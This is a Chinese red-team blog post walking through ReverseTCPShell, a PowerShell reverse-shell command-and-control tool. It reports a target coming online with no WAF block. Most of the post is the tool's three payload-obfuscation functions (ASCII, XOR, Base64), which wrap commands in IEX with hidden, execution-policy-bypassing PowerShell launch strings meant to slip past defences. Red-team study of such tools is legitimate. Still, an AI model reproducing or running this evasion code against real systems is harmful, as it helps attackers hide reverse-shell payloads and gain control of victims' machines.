RedTeam之ReverseTCPShell

2021-04-15 13:11:57 浏览数 (1)

大家好啊,我是我们实验室的Mr.赵,几天前,一师傅就在说这个工具,正好,这个工具今天就出来了,我们一起来常常鲜,由于kali已经支持powershell了,这里我们就直接使用kali来演示了。

先奉上原作者的演示视频:

界面简单无比,十分符合老外的个性,ReverseTCPShell C2,正如其名,是一款powershell编写的反弹shell工具,流量经过AES加密,据说可以bypass,上手看看吧。

提供了3种payload的混淆的方式:ASCII、xor、Base64,这里随便选择xor

也是直接给出来了PS下的和CMD下的利用,并监听4444端口

靶机上线,waf无拦截

简单命令执行:

常见的文件上传、下载啥的自然也是可以的

至于实现方式也是很容易就能看出来的,三个函数

ASCLL

代码语言:javascript复制
function ASCII_Obfuscation($String)
{
  $PowerShell = "IEX(-Join((@)|%{[char]`$_}));Exit";
  $CMD = "ECHO `"IEX(-Join((@)|%{[char]```$_}));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
  
  $String = [System.Text.Encoding]::ASCII.GetBytes($String) -join ',';
  
  $PowerShell = Character_Obfuscation($PowerShell);
  $PowerShell = $PowerShell -replace "@","$String";

  $CMD = Character_Obfuscation($CMD);
  $CMD = $CMD -replace "@","$String";
  
  Return $PowerShell,$CMD;
}

XOR

代码语言:javascript复制
function BXOR_Obfuscation($String)
{
  $PowerShell = "IEX(-Join((@)|%{[char](`$_-BXOR #)}));Exit";
  $CMD = "ECHO `"IEX(-Join((@)|%{[char](```$_-BXOR #)}));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";

  $Key = '0x'   ((0..5) | Get-Random)   ((0..9)   ((65..70)   (97..102) | % {[char]$_}) | Get-Random);
  $String = ([System.Text.Encoding]::ASCII.GetBytes($String) | % {$_ -BXOR $Key}) -join ',';
  
  $PowerShell = Character_Obfuscation($PowerShell);
  $PowerShell = $PowerShell -replace "@","$String";
  $PowerShell = $PowerShell -replace "#","$Key";

  $CMD = Character_Obfuscation($CMD);
  $CMD = $CMD -replace "@","$String";
  $CMD = $CMD -replace "#","$Key";

  Return $PowerShell,$CMD;
}

base64

代码语言:javascript复制
function Base64_Obfuscation($String)
{
  $PowerShell = "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit";
  $CMD = "ECHO `"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
  
  $Seed = (Get-Random -Minimum 0 -Maximum 999999999).ToString('000000000');
  $String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($String))) | Sort-Object {Get-Random -SetSeed $Seed}));
  
  $PowerShell = Character_Obfuscation($PowerShell);
  $PowerShell = $PowerShell -replace "@","$String";
  $PowerShell = $PowerShell -replace "#","$Seed";

  $CMD = Character_Obfuscation($CMD);
  $CMD = $CMD -replace "@","$String";
  $CMD = $CMD -replace "#","$Seed";

  Return $PowerShell,$CMD;
}

唔,那今天就到这里吧..

powershell shell

0 人点赞